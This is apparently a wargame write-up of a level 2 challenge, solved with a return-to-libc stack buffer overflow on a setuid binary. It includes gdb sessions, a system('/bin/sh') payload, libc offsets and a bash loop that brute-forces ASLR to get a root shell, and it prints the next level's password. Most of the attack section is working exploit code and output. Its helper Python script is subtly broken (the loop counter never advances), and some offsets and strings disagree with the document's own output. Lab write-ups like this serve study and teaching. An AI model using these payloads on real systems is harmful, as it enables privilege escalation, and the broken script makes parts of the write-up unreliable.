# Writeup - level 2

## Finding out what is going on

1. export bash variable and run the file
    - `export filename=".viminfo"; ./getowner`
    - It looks for files under "/tmp/"

As we have a fixed-size buffer at the stack, we know its probably a buffer overflow. As it has only a `main` function, we suspect it is a `return-to-libc`.

It is important to understand how the memory layout of a C/C++ program is set. Check out [1] for more details:

![memory_layout](imgs/memory_layout.png)
_Figure 1: Memory layout of a program [1]_

Run it like this to check if it segfaults and the size our payload must have

```bash
export filename=$(python -c "print 'a'*128+'BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM'"); gdb -q ./getowner
```

Set a breakpoint at the end of main:

```gdb
(gdb) set disassembly-flavor intel
(gdb) layout prev
(gdb) b *0x804850c
(gdb) r
(gdb) x/32wx $esp
0xbff87b28:     0x43434342      0x44444443      0x45454544      0x46464645
0xbff87b38:     0x47474746      0x48484847      0x49494948      0x4a4a4a49
0xbff87b48:     0x4b4b4b4a      0x4c4c4c4b      0x4d4d4d4c      0xb76a004d
0xbff87b58:     0x00000000      0x00000000      0x00000000      0xb77d1090
0xbff87b68:     0xb76a1ded      0xb77dbff4      0x00000001      0x08048390
0xbff87b78:     0x00000000      0x080483b1      0x08048434      0x00000001
0xbff87b88:     0xbff87ba4      0x08048560      0x08048510      0xb77d1c40
0xbff87b98:     0xbff87b9c      0xb77dc4e4      0x00000001      0xbff89b2e
```

We see here that the next two instructions are:
```bash
0x804850c <main+216>            pop    ebp
0x804850d <main+217>            ret
```

Which will pop `0x43434342` from the stack and set to ebp, and then jump to `0x44444443`, which means we need to set our desired return address after the third `'C'` in our payload (check `man ascii` if you don't believe me).

A good option might be the `system` function. Let's check its address:
```gdb
(gdb) p system
$1 = {<text variable, no debug info>} 0xb76c29b0 <system>
```

After running a few times, changing the amount of Cs and Ds and using ltrace to debug the return value, we get to

```bash
export filename=$(python -c "print 'a'*128+'BBBBCCC\xb0\x29\x6c\xb7EEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM'"); ltrace -i -S ./getowner
```

If we ran `man system` we see that this function expects one parameter. We use xxd to get it in little-endian as well:

```bash
echo "/bin/sh" | xxd -e -g 8
00000000: 0a68732f6e69622f                   /bin/sh.
```
By stripping the 0a and appending the null byte: `\x00\x68\x73\x2f\x6e\x69\x62\x2f`
```bash
export filename=$(python -c "print 'a'*128+'BBBBCCC\xb0\x29\x6c\xb7\x00\x68\x73\x2f\x6e\x69\x62\x2fFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM'"); gdb -q ./getowner
```

## Slamming into ASLR

After a few tries leading only to segfaults and illegal instructions, I searched form some solutions and learned about `ASLR (Address Space Layout Randomization)`. I also noticed that it was on in this system:

```bash
level2@blackbox:~$ ldd ./getowner
        linux-gate.so.1 =>  (0xb76f8000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb75bf000)
        /lib/ld-linux.so.2 (0xb76f9000)
level2@blackbox:~$ ldd ./getowner
        linux-gate.so.1 =>  (0xb77c0000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7687000)
        /lib/ld-linux.so.2 (0xb77c1000)
level2@blackbox:~$ ldd ./getowner
        linux-gate.so.1 =>  (0xb7799000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7660000)
        /lib/ld-linux.so.2 (0xb779a000)
level2@blackbox:~$ ldd ./getowner
        linux-gate.so.1 =>  (0xb77db000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb76a2000)
        /lib/ld-linux.so.2 (0xb77dc000)
```

But if you pay attention, you will realize that only a few bytes are changed in every iteration. So, one option is to bruteforce our way into this thing. First, we need to find addresses of common functions in libc:

```bash
readelf -s /lib/libc.so.6 | egrep system
   485: 00035550   125 FUNC    WEAK   DEFAULT   11 system@@GLIBC_2.0
```

```bash
readelf -s /lib/libc.so.6 | egrep exit
   1858: 0002af90   219 FUNC    GLOBAL DEFAULT   11 exit@@GLIBC_2.0
```

We also want to find the address for `/bin/sh`:

```bash
strings -a -t x /lib/libc.so.6 | grep /bin/sh
 109fe8 /bin/sh
```

So, as it turns out, our exploit is comprised of:

> A * 128 + 'BBBBCCC' + address of system() + address of exit() + address of '/bin/sh'

### Calling conventions and stack frames

**WAIT!** But why the hell that is the order we want to use? Why do we _need_ `exit()`?

Well, we don't really NEED to call exit, but that is a way to end the exploited program gracefully, without running into a segfault (which may alarm the sysadmin that is reading the logs). In regard to the order of the parameters, you need to understand how the stack frame for a function is formed.

Suppose we are calling a function `add(7, 8)`. What happens under the hood is something like this:

```asm
push 8
push 7
call add    % this instruction pushes eip+1 to the stack and moves to the addr of "add" function
```
The above assembly code is forming a new stack frame as shown in Figure 2:
![stack_frame](imgs/stack_frame.png)
_Figure 2: Stack frame layout of add function_

So, what is actually happenning is
> * A*128 => overwrites our local variable (`char buf[128]`) in `main()` stack frame
> * 'BBBBCCC' => overwrites saved `$ebp` in `main()` stack frame
> * `system()` => overwrites the return address in `main()` stack frame
> * `exit()` => writes the return address in `system()` stack frame
> * "/bin/bash" => writes the parameter for `system()` stack frame

It means that when the following instructions are executed:

```bash
0x804850c <main+216>            pop    ebp
0x804850d <main+217>            ret  % this instruction pops the address from the
                                     % stack and sets eip to it. Remember that the
                                     % call instruction pushes the return address!
```

We are jumping into `system()` with the correct parameter and a return address already set! As we know from the calling conventions, the `$ebp` will be reset at `system()` prologue.


### Bypassing ASLR using bruteforce

As ASLR is turned on, we want the address for these functions offsetted by libc's base address. So, in order to call `system()` we use `libc base address + system offset`. We could use the following python script, but it is not mandatory.

```python
from subprocess import call
import struct

libc_addr     = 0xb7689000 # Base address of libc
sys_off_addr  = 0x000359b0 # Offset to system()
exit_off_addr = 0x0002b420 # Offset to exit()
arg_off_addr  = 0x120dce   # Offset to "/bin/sh"

sys_addr = struct.pack("<I", libc_addr+sys_off_addr)
exit_addr = struct.pack("<I", libc_addr+exit_off_addr)
arg_addr = struct.pack("<I", libc_addr+arg_off_addr)

buf =  bytes("A" * 128)  # char buf[128];
buf += bytes("BBBBCCC") # could be NOPS...
buf += sys_addr
buf += exit_addr
buf += arg_addr
i = 0
while (i < 512):
    print "Try: %s" %i
    print buf
    i += i
    ret = call(["export filename='{}'./getowner".format(buf)])

```

But as we all know, bash is waaaaay more fun (and easier to use in this case, as we don't have write permissions)! I just got the string made with the above script and ran trough a similar loop in bash:

```bash
for i in {1..512}; do export filename=$(python -c "print 'a'*128+'BBBBCCC\xb0\xe9k\xb7 Dk\xb7\xce\x9dz\xb7'"); ./getowner; done
```

After a few iterations we become root:

```
sh-3.1$ cat ../level3/password
OverTheFlow
```

**PS:** The number 512 was just a lucky guess. It could be more assertive to use 4096 (2^12 -> the number of bits changing in libc's address). Or, if you are a dangerous person you coulde use an infinite loop. You go, girl!

## Resources

1. https://hackthedeveloper.com/memory-layout-c-program/
2. https://spz.io/2018/10/18/buffer-overflow-return-to-libc/
3. https://medium.com/@akshitsinghal6399/how-to-bypass-aslr-to-perform-buffer-overflow-attacks-2d5f6707399c
4. https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-i/
5. https://www.tenouk.com/Bufferoverflowc/Bufferoverflow2a.html
